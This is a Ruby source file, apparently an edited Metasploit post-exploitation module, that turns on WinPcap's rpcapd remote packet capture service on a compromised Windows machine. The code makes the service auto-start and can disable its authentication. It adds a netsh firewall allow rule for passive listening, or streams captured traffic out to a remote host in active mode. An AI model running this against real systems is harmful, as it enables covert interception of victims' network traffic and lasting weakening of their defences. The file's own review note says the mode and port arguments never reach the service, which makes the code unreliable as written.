rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/rpcapd_start.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
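class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::Priv

  # Name of the WinPcap remote capture service this module manages.
  SERVICE_NAME = 'rpcapd'
  # Location of the rpcapd binary below %ProgramFiles% (single-quoted, so each
  # '\\' is one backslash on the target).
  RPCAPD_RELATIVE_PATH = '\\winpcap\\rpcapd.exe'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Remote Packet Capture Service Starter',
        'Description' => %q{
          This module enables the Remote Packet Capture System (rpcapd service)
          included in the default installation of Winpcap. The module allows you to set up
          the service in passive or active mode (useful if the client is behind a firewall).
          If authentication is enabled you need a local user account to capture traffic.
          PORT will be used depending of the mode configured.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The module switches the service to auto-start and, in passive mode,
          # adds a Windows Firewall allow rule; both persist after the session.
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),
        OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),
        OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),
        OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.', 2002])
      ]
    )
  end

  # Entry point: checks privileges, verifies the rpcapd service is present,
  # makes it auto-start, builds the rpcapd command line from the datastore
  # and restarts the service.
  #
  # @return [void]
  def run
    # Changing service configuration and firewall rules requires an elevated
    # session. The original check was inverted (it bailed out when the session
    # WAS admin while claiming a lack of privileges).
    unless is_admin?
      print_error("You don't have enough privileges. Try getsystem.")
      return
    end

    print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")
    serv = service_info(SERVICE_NAME)
    # Guard against a nil/absent lookup result before touching its fields.
    display = serv && serv[:display]

    # WinPcap registers the service with a display name containing "Remote".
    if display.to_s !~ /remote/i
      print_error("This machine doesn't seem to have the rpcapd service")
      return
    end
    print_status("Rpcap service found: #{display}")

    prog = rpcapd_path
    return unless prog # rpcapd_path has already reported the problem

    if serv[:starttype] != START_TYPE_AUTO
      print_status("Setting rpcapd as 'auto' service")
      service_change_startup(SERVICE_NAME, START_TYPE_AUTO)
    end

    port = datastore['PORT']
    if datastore['ACTIVE']
      rhost = datastore['RHOST']
      if rhost.nil?
        print_error('RHOST is not set ')
        return
      end
      # Active mode: rpcapd connects out to RHOST:PORT (-a) and keeps verbose output (-v).
      args = ['-d', '-a', "#{rhost},#{port}", '-v']
      print_status("Installing rpcap in ACTIVE mode (remote port: #{port})")
    else
      # Passive mode: rpcapd listens on PORT (-p), so the firewall must let it in.
      fw_enable(prog)
      print_status("Installing rpcap in PASSIVE mode (local port: #{port}) ")
      args = ['-d', '-p', port.to_s]
    end

    # -n disables authentication on the capture service.
    args << '-n' if datastore['NULLAUTH']

    run_rpcapd(([prog] + args).join(' '))
  end

  # Resolves the absolute path of rpcapd.exe on the target.
  #
  # @return [String, nil] the path, or nil (after printing an error) when
  #   %ProgramFiles% cannot be read from the session environment
  def rpcapd_path
    program_files = get_env('ProgramFiles')
    if program_files.nil? || program_files.empty?
      print_error('Could not resolve %ProgramFiles% on the target')
      return nil
    end
    # Build a fresh string instead of appending to get_env's return value with
    # '<<', which mutated that string in place in the original.
    "#{program_files}#{RPCAPD_RELATIVE_PATH}"
  end

  # Restarts the rpcapd service and reports the outcome.
  #
  # NOTE(review): `cmdline` is only echoed here; service_restart is called with
  # the service name alone, so the mode/port/auth arguments assembled in #run
  # are never applied to the service's binary path. The Services mixin's
  # service_change_config looks like the intended way to set that path —
  # confirm against the mixin before relying on the ACTIVE/PORT/NULLAUTH options.
  #
  # @param cmdline [String] the rpcapd command line reported on success
  # @return [void]
  def run_rpcapd(cmdline)
    if service_restart(SERVICE_NAME)
      print_good("Rpcapd started successfully: #{cmdline}")
    else
      print_error('There was an error restarting rpcapd.exe.')
    end
  rescue StandardError => e
    print_error("The following error was encountered: #{e.class} #{e}")
  end

  # Adds a Windows Firewall allow rule for rpcapd.exe so that passive-mode
  # listeners are reachable.
  #
  # @param prog [String] absolute path of rpcapd.exe on the target
  # @return [void]
  def fw_enable(prog)
    print_status('Enabling rpcapd.exe in Windows Firewall')
    unless file_exist?(prog)
      print_error("rpcapd.exe doesn't exist in #{prog}. Check the installation of WinPcap")
      return
    end
    # `netsh firewall` is the legacy (pre-advfirewall) syntax the module has
    # always used; 30 is the cmd_exec timeout in seconds, kept from the original.
    cmd_exec('netsh', "firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ", 30)
  rescue StandardError => e
    # Reported as an error (not a status line) to match run_rpcapd.
    print_error("The following error was encountered: #{e.class} #{e}")
  end
end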